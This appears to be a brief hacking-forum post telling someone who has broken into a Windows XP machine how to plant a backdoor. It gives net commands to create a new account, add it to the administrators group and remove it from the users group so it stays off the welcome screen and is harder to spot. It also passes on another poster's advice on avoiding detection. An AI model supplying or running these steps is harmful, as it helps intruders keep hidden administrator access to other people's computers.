net user desiredusername desiredpassword /add
than if you want to add that username to the admin group
net localgroup administrators desiredusername /add

if you hack and windows xp box which uses a normal win xp welcome screen with the icons and stuff i'd recommend also this command

net localgroup users YOURUSER /delete

this will prevent that your user get added in the welcome screen

When doing it definately take DumpZ advice and remove your user from groups as it makes it very obvious that it's a new account as most admin accounts don't belong to the group users.
